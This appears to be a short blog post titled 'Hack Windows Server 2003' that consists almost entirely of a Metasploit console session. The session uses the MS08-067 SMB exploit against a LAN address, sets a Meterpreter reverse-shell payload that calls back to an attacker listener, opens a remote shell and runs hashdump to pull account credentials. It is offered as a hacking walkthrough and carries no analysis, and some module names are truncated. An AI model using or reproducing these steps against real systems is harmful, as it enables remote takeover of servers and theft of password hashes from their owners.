IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|\`.""'.
II 6. .P : .' / | \ `. :
II 'T;. .;P' '.' / | \ `.'
II 'T; ;P' `. / | \ .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit
=[ metasploit v4.10.0-2014100101 [core:4.10.0.pre.2014100101 api:1.0.0]]
+ -- --=[ 1347 exploits - 743 auxiliary - 217 post ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search netapi
[!] Database not connected or cache not built, using slow search
Matching Modules
================
Name
----
exploit/windows/smb/ms03_049_
exploit/windows/smb/ms06_040_
exploit/windows/smb/ms06_070_
exploit/windows/smb/ms08_067_
msf > use exploit/windows/smb/ms08_067_
msf exploit(ms08_067_netapi) > set PAYLOAD WINDOWS/meterpreter/reverse_
[-] The value specified for PAYLOAD is not valid.
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_
PAYLOAD => windows/meterpreter/reverse_
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.124
RHOST => 192.168.1.124
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.159
LHOST => 192.168.1.159
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.124 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.1.159 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploits
[-] Unknown command: exploits.
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.159:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (769536 bytes) to 192.168.1.124
[*] Meterpreter session 1 opened (192.168.1.159:4444 -> 192.168.1.124:1027) at 2015-06-04 02:01:10 -0700
meterpreter > shell
Process 588 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>hashdump
hashdump
'hashdump' is not recognized as an internal or external command,
operable program or batch file.
C:\WINDOWS\system32>exit
meterpreter > hashdump
Administrator:500:
dedi:1003:
Guest:501:
SUPPORT_388945a0:1001:
meterpreter >
0 Response to "Hack Windows Server 2003"
Post a Comment